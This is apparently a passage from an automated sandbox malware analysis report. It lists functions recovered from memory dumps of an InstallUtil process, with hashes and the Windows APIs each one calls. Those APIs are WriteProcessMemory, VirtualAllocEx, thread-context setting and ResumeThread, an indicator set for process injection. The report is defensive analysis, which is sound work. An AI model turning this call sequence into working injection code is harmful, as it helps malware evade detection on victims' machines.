                                                                                                          • Instruction Fuzzy Hash: 9F518F7190D3D48FC712CBB8985479ABFB0AF07214F1941DBC595EB2A3D6785809C7A2
                                                                                                          Function 085E2A48 Relevance: 1.6, Strings: 1, Instructions: 385COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Hbq
                                                                                                          • API String ID: 0-1245868
                                                                                                          • Opcode ID: 029573db09dbd82d7f97cbf2e8fe405cc02b65259d1b1ab87064476721544470
                                                                                                          • Instruction ID: 5019f163fc737d14a58f0e6ea8e40d8d0f145410753e2527810e41fe7ee06389
                                                                                                          • Opcode Fuzzy Hash: 029573db09dbd82d7f97cbf2e8fe405cc02b65259d1b1ab87064476721544470
                                                                                                          • Instruction Fuzzy Hash: 03C1D431B141158BDB08BBBDD84526EBBB6FBC8604F40496DE049DB354DE388C0AD3A6
                                                                                                          Function 07F905A0 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07F90638
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2921651222.0000000007F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7f90000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3559483778-0
                                                                                                          • Opcode ID: 407ea006daf4e5473cb1deb2b3564f228688cda34093db42dcbbcbb2ef019e19
                                                                                                          • Instruction ID: 260b12ef711606907c133f289bdfd1a926653576a74f17ac7300d328a7b68801
                                                                                                          • Opcode Fuzzy Hash: 407ea006daf4e5473cb1deb2b3564f228688cda34093db42dcbbcbb2ef019e19
                                                                                                          • Instruction Fuzzy Hash: C42146B19002499FDB10CFA9C881BDEBBF1FB88310F14842AE559A7250D7749945CB64
                                                                                                          Function 07F905A8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07F90638
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2921651222.0000000007F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7f90000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3559483778-0
                                                                                                          • Opcode ID: fe5be7d92a1c914e6ecaf90c9c3f64b39cd66fa5a54f13c737ddce44c1ae54bf
                                                                                                          • Instruction ID: 468cdbd90c281ca36ba1991843e764f20e037bf66d4b0edf3b4d61207de6d4fa
                                                                                                          • Opcode Fuzzy Hash: fe5be7d92a1c914e6ecaf90c9c3f64b39cd66fa5a54f13c737ddce44c1ae54bf
                                                                                                          • Instruction Fuzzy Hash: 1D2146B1900359DFDB10CFA9C881BDEBBF5FF88310F108429E958A7240D7789944CBA4
                                                                                                          Function 07F90CE0 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07F90D66
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2921651222.0000000007F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7f90000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 983334009-0
                                                                                                          • Opcode ID: 403b91b740c73004fd931231190e1fb49766773a9bdca70b58a7c533a16df37a
                                                                                                          • Instruction ID: 8cdf372d7ede16f238f9a4bf1a65eeac71218db35aac511b6ddeebe034ea79c2
                                                                                                          • Opcode Fuzzy Hash: 403b91b740c73004fd931231190e1fb49766773a9bdca70b58a7c533a16df37a
                                                                                                          • Instruction Fuzzy Hash: A22128B1D002498FDB10DFAAC4857EEBBF0AF88324F14842ED559A7241CB78A985CF94
                                                                                                          Function 07B7FB70 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 07B7FBEE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2921271295.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7b70000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 983334009-0
                                                                                                          • Opcode ID: 5c00c722bac7048a3f09749ad59bbcf19edf315ff76f3a6a79dbc862519b4cdd
                                                                                                          • Instruction ID: 5b797508d4eeb4e8bdb76f9ca65863a643ea7b6c9f7372d11bc8669b4fe13ff3
                                                                                                          • Opcode Fuzzy Hash: 5c00c722bac7048a3f09749ad59bbcf19edf315ff76f3a6a79dbc862519b4cdd
                                                                                                          • Instruction Fuzzy Hash: 882118B19002098FDB10DFAAC4857EEBBF4EF48324F14842AD559A7241D778A945CFA5
                                                                                                          Function 07F90CE8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07F90D66
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2921651222.0000000007F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7f90000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 983334009-0
                                                                                                          • Opcode ID: 4137740d09fe4c01463440532f7a85e151574978e73ada890b1b273a2e294c51
                                                                                                          • Instruction ID: 2546896ad3499be52805f6ab7ed501ea7ee9cdd5a2cc684068d183a4e57f0062
                                                                                                          • Opcode Fuzzy Hash: 4137740d09fe4c01463440532f7a85e151574978e73ada890b1b273a2e294c51
                                                                                                          • Instruction Fuzzy Hash: 8F2129B1D003098FDB10DFAAC4857EEBBF4EF88324F14842AD559A7241DB78A944CFA5
                                                                                                          Function 07F90A40 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 07F90ABF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2921651222.0000000007F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7f90000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: 120fe9f14e1f5345fc7465a8bff3b18575658c23b3e716fc5dddbe24b979b811
                                                                                                          • Instruction ID: 46a729d4e9ba4ed00110b33f4d8f62789e595c032787fe97798035575bc5e509
                                                                                                          • Opcode Fuzzy Hash: 120fe9f14e1f5345fc7465a8bff3b18575658c23b3e716fc5dddbe24b979b811
                                                                                                          • Instruction Fuzzy Hash: CE2168B1C002499FDB10DFAAC445BEEBBF0FF48320F14842AE459A7250C7789945CFA1
                                                                                                          Function 07F90A48 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 07F90ABF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2921651222.0000000007F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7f90000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: feeaeff326e02633bfe046ef539789a9c9790426c86e921eb25ed2f55f4d32b1
                                                                                                          • Instruction ID: 5525f5b44784d5649ed4cf3cd9995b518dd34a26ee8aeed87f2b18d45ef5d824
                                                                                                          • Opcode Fuzzy Hash: feeaeff326e02633bfe046ef539789a9c9790426c86e921eb25ed2f55f4d32b1
                                                                                                          • Instruction Fuzzy Hash: 892135B18002499FDB10DFAAC844BEEBBF5FF48320F148829D559A7250CB78A944CFA1
                                                                                                          Function 0842B2B4 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 0842C438
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922177512.0000000008420000.00000040.00000800.00020000.00000000.sdmp, Offset: 08420000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_8420000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DeleteFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 4033686569-0
                                                                                                          • Opcode ID: 6d3cc8b09a6a6d59f1f49bc3e1c7db93bf46023a25a84eb8a3e8fb6dd9094e53
                                                                                                          • Instruction ID: e37d5dbbe0f4f32e2711acecee1d683026d9e089ca7e8f64e7db8561de71bd44
                                                                                                          • Opcode Fuzzy Hash: 6d3cc8b09a6a6d59f1f49bc3e1c7db93bf46023a25a84eb8a3e8fb6dd9094e53
                                                                                                          • Instruction Fuzzy Hash: F12144B1C04669DBCB10CF9AC4447AEFBB4EF48320F10812AD818A7340D338AA50CFA5
                                                                                                          Function 07B76992 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 07B76A0B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2921271295.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7b70000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: 48145fae9d6ab6a7e89420b4572ae21c448339b6be413396850638b756a8d8a4
                                                                                                          • Instruction ID: b052bfc8275647247b2b2ce5c6a17692300c0c79f1939f08dfcda308c85d0d99
                                                                                                          • Opcode Fuzzy Hash: 48145fae9d6ab6a7e89420b4572ae21c448339b6be413396850638b756a8d8a4
                                                                                                          • Instruction Fuzzy Hash: F32106B59006499FDB10DF9AC484BDEFFF4FB48320F108429E958A7251D378AA44CFA1
                                                                                                          Function 07B76998 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 07B76A0B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2921271295.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7b70000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: da3bd4c6fc5d4e511397483dbdc81846889c20b01586bccf2d376ce374d53d75
                                                                                                          • Instruction ID: 9e8c970d2ce38dc7f8bb205b291fafa4170cd05a88c1ca59fb36a1f9c78fdfed
                                                                                                          • Opcode Fuzzy Hash: da3bd4c6fc5d4e511397483dbdc81846889c20b01586bccf2d376ce374d53d75
                                                                                                          • Instruction Fuzzy Hash: AE21E7B59006499FDB10DF9AC484BDEFBF4FB48324F108429E558A7250D374A644CFA5
                                                                                                          Function 07F90260 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07F902D6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2921651222.0000000007F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7f90000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4275171209-0
                                                                                                          • Opcode ID: f56a1ac8840f8ff111fa8fa64084343658fcb77c433c654468c9114f5eff57d4
                                                                                                          • Instruction ID: bb894ce66cf5abc23c20e6bc13837cc0fcdd3a78da1462509ae589d06cb3a5fc
                                                                                                          • Opcode Fuzzy Hash: f56a1ac8840f8ff111fa8fa64084343658fcb77c433c654468c9114f5eff57d4
                                                                                                          • Instruction Fuzzy Hash: 8E1159B29002499FDF10DFA9C444BEEBFF5EF88320F248829E559A7250C7759945CFA4
                                                                                                          Function 07BAE260 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 07BAE2D3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2921466014.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7ba0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: f78499cef50ce0d1fe5234aa06755692cbae8544190c601e947b59a0b0f9a922
                                                                                                          • Instruction ID: cdda8bba562ac2bb99cbcd7fbb8c04b29b2bfe2896531c4368529090395ccfdd
                                                                                                          • Opcode Fuzzy Hash: f78499cef50ce0d1fe5234aa06755692cbae8544190c601e947b59a0b0f9a922
                                                                                                          • Instruction Fuzzy Hash: A921E4B5900259DFDB10DF9AC485BDEFBF4FB48320F10846AE958A7250D378A644CFA5
                                                                                                          Function 07F90268 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07F902D6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2921651222.0000000007F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7f90000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4275171209-0
                                                                                                          • Opcode ID: 8f44b8ded7a964bfb6b28a604a412b64d8d91723a009267fb97174047fce62c1
                                                                                                          • Instruction ID: 1c5a0423f07ddb6cb4eae060c537b600ae2d0fbf824b2816f9c28816444c07d3
                                                                                                          • Opcode Fuzzy Hash: 8f44b8ded7a964bfb6b28a604a412b64d8d91723a009267fb97174047fce62c1
                                                                                                          • Instruction Fuzzy Hash: 01116AB18002499FCB10DFA9C844BDEBFF5EF48320F148819D519A7250C735A544CFA4
                                                                                                          Function 07F90F48 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2921651222.0000000007F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7f90000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ResumeThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 947044025-0
                                                                                                          • Opcode ID: c606d48e5e72c0ac4fb44a42f6e4b2c09b67636ea6921510e41ecaea9c80a798
                                                                                                          • Instruction ID: 706f45f440fb984c9b9fb58495ca4706b9bdad1ce489eece6cbe5d98c9a218ea
                                                                                                          • Opcode Fuzzy Hash: c606d48e5e72c0ac4fb44a42f6e4b2c09b67636ea6921510e41ecaea9c80a798
                                                                                                          • Instruction Fuzzy Hash: C71146B1D002498EDB20DFAAC4457EEFFF5EF88324F248829D459A7250CB74A945CF94
                                                                                                          Function 07F90F50 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2921651222.0000000007F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7f90000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ResumeThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 947044025-0
                                                                                                          • Opcode ID: 13a06f403f9335189124477e6c6c63dff6af84b96d67351bd30c1e653b8a217a
                                                                                                          • Instruction ID: ba267cc4c5792a57e66af0e49c2f99a9305e49368cd31d6ffbcd66e0e8f1291d
                                                                                                          • Opcode Fuzzy Hash: 13a06f403f9335189124477e6c6c63dff6af84b96d67351bd30c1e653b8a217a
                                                                                                          • Instruction Fuzzy Hash: 3F1155B19002498BDB20DFAAC4457DEFBF4EB88324F248829D419A7240CB34A944CFA4
                                                                                                          Function 07F913E0 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • PostMessageW.USER32(?,?,?,?), ref: 07F91445
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2921651222.0000000007F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7f90000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost
                                                                                                          • String ID:
                                                                                                          • API String ID: 410705778-0
                                                                                                          • Opcode ID: c7bca18220a11fadfcb1a1de4238d4804456b7de370275ec37c5f2d24f00ad8f
                                                                                                          • Instruction ID: 30eef473cd27949ca0562a632c9db9227f78f816da67eb9d19c40b6b788b5ee9
                                                                                                          • Opcode Fuzzy Hash: c7bca18220a11fadfcb1a1de4238d4804456b7de370275ec37c5f2d24f00ad8f
                                                                                                          • Instruction Fuzzy Hash: 3F1103B58003499FDB10CF99D489BDEBFF4FB48324F14882AE559A7610D375A984CFA1
                                                                                                          Function 07F913E8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • PostMessageW.USER32(?,?,?,?), ref: 07F91445
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2921651222.0000000007F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7f90000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost
                                                                                                          • String ID:
                                                                                                          • API String ID: 410705778-0
                                                                                                          • Opcode ID: 9a07c717ea2055140f2edc19f0951b38cf49a1f76ee2b5019a1d869a594747c3
                                                                                                          • Instruction ID: 019a3998a3d0e2144d52c4f0827135d5196a5b9f196b6f3341130955c396fce4
                                                                                                          • Opcode Fuzzy Hash: 9a07c717ea2055140f2edc19f0951b38cf49a1f76ee2b5019a1d869a594747c3
                                                                                                          • Instruction Fuzzy Hash: 3D1103B58003499FDB10DF9AC445BDEBBF8FB48320F108819D558A7200D375A544CFA1
                                                                                                          Function 031D4538 Relevance: 1.5, Strings: 1, Instructions: 225COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2903398659.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_31d0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: d
                                                                                                          • API String ID: 0-2564639436
                                                                                                          • Opcode ID: 3286cff727549069a5307581d028da5063ea3559db41efa9b6f6e99fd740edfc
                                                                                                          • Instruction ID: c1b74dc880ef6dff01b60d4daf33a9b3d943e719551638eef5b3f46d749dd541
                                                                                                          • Opcode Fuzzy Hash: 3286cff727549069a5307581d028da5063ea3559db41efa9b6f6e99fd740edfc
                                                                                                          • Instruction Fuzzy Hash: D1817234B00205CFE708DB69D95476EBBEAFB8E700F158469E119AB394CF35DC858B91
                                                                                                          Function 085EFB70 Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'^q
                                                                                                          • API String ID: 0-1614139903
                                                                                                          • Opcode ID: 96946a4d842ada2aadf4fa2f9bc15f56eb2bb7696326898fd9a2c04c1f8f1457
                                                                                                          • Instruction ID: 915972fc71e2817f6530e4b48b4b2e26ffa5ac76aae027fc4d14a272d1926eba
                                                                                                          • Opcode Fuzzy Hash: 96946a4d842ada2aadf4fa2f9bc15f56eb2bb7696326898fd9a2c04c1f8f1457
                                                                                                          • Instruction Fuzzy Hash: 59718231B00106CFCB08AFB9D84557EBBB6FB88705F458868E445D7355DE389D0A9792
                                                                                                          Function 031D4548 Relevance: 1.5, Strings: 1, Instructions: 218COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2903398659.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_31d0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: d
                                                                                                          • API String ID: 0-2564639436
                                                                                                          • Opcode ID: 40c3fb929da6fcc2e34046091dc4b88673bf1e6d4cc332344974cc194285719d
                                                                                                          • Instruction ID: 6743e7e208a3e89c81d420f18876381b1f10346af1c32d5d9b412c07f413a776
                                                                                                          • Opcode Fuzzy Hash: 40c3fb929da6fcc2e34046091dc4b88673bf1e6d4cc332344974cc194285719d
                                                                                                          • Instruction Fuzzy Hash: F4716230B00205CFE708DB69D95476EBBEAFB8E700F158469E119AB394CF39DC858B91
                                                                                                          Function 031D8B48 Relevance: 1.5, Strings: 1, Instructions: 207COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2903398659.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_31d0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'^q
                                                                                                          • API String ID: 0-1614139903
                                                                                                          • Opcode ID: cd8ee2bf30ecebff61bf72383ecef35ecab2af45ea2bc40d2f06f29f637c5918
                                                                                                          • Instruction ID: 5a15e0b981cfc68098eb1ba4ccd9018bd85004b1bb765b24bbe1bd7ce74a15b8
                                                                                                          • Opcode Fuzzy Hash: cd8ee2bf30ecebff61bf72383ecef35ecab2af45ea2bc40d2f06f29f637c5918
                                                                                                          • Instruction Fuzzy Hash: C7617031305515DFCB18DF39D884ABABBE9FF4E64071944AAE41ACB3A5DB31EC418B60
                                                                                                          Function 031DAF00 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2903398659.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_31d0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (bq
                                                                                                          • API String ID: 0-149360118
                                                                                                          • Opcode ID: 900048b764414e1c99306b5134e9095e3d6d5d204cde30ed305b318cabcf6bb9
                                                                                                          • Instruction ID: 3b6db140c35e42b2f78d48593824a3e8c406e4db0f00e8705140db67100a6fe5
                                                                                                          • Opcode Fuzzy Hash: 900048b764414e1c99306b5134e9095e3d6d5d204cde30ed305b318cabcf6bb9
                                                                                                          • Instruction Fuzzy Hash: 52519B34E0421A8FCB14EFA9D4546EEBBF6BF89710F25C069E516BB344DB319941CBA0
                                                                                                          Function 031DC8E9 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2903398659.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_31d0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Hbq
                                                                                                          • API String ID: 0-1245868
                                                                                                          • Opcode ID: db802e58ce07a6072c790ecf1bb28e805c44156c6b975ed91cd8c93671055624
                                                                                                          • Instruction ID: 62b4012177b426d98bcf1d1f53efbcd9c14275c104db74d4ff1054c87f1f3c97
                                                                                                          • Opcode Fuzzy Hash: db802e58ce07a6072c790ecf1bb28e805c44156c6b975ed91cd8c93671055624
                                                                                                          • Instruction Fuzzy Hash: F241B3313102159FCB19DF29D854A7E7BAAEB8E311F098469F946CB391CB38DC12DB90
                                                                                                          Function 085E1938 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (bq
                                                                                                          • API String ID: 0-149360118
                                                                                                          • Opcode ID: dd736371d3365b02cbb555907d7e3714e2f836124a0cf44917b7bdbce05b5c7f
                                                                                                          • Instruction ID: cdf91dfd3825f45a2eb5660d2955e6689fb78b0073b4a730228923f58914893e
                                                                                                          • Opcode Fuzzy Hash: dd736371d3365b02cbb555907d7e3714e2f836124a0cf44917b7bdbce05b5c7f
                                                                                                          • Instruction Fuzzy Hash: 06318E31E0064A8FCB11EFA9D8405EEBBF5FF89311F14826AE509F7212EB309945CB90
                                                                                                          Function 085E267F Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (bq
                                                                                                          • API String ID: 0-149360118
                                                                                                          • Opcode ID: cb926c01ed480d89b97db0cdbae06aa682b329d2623ea48001368e8a726a0a02
                                                                                                          • Instruction ID: 8366fea51a6b95586223ef3e31a64ea81ba39fee960e8847e6e30067aa575086
                                                                                                          • Opcode Fuzzy Hash: cb926c01ed480d89b97db0cdbae06aa682b329d2623ea48001368e8a726a0a02
                                                                                                          • Instruction Fuzzy Hash: 7F3113B4D00248DFDB24DFA9C988B9EBFF6FB48310F248469E445AB251C7B46845CFA1
                                                                                                          Function 085E25F6 Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
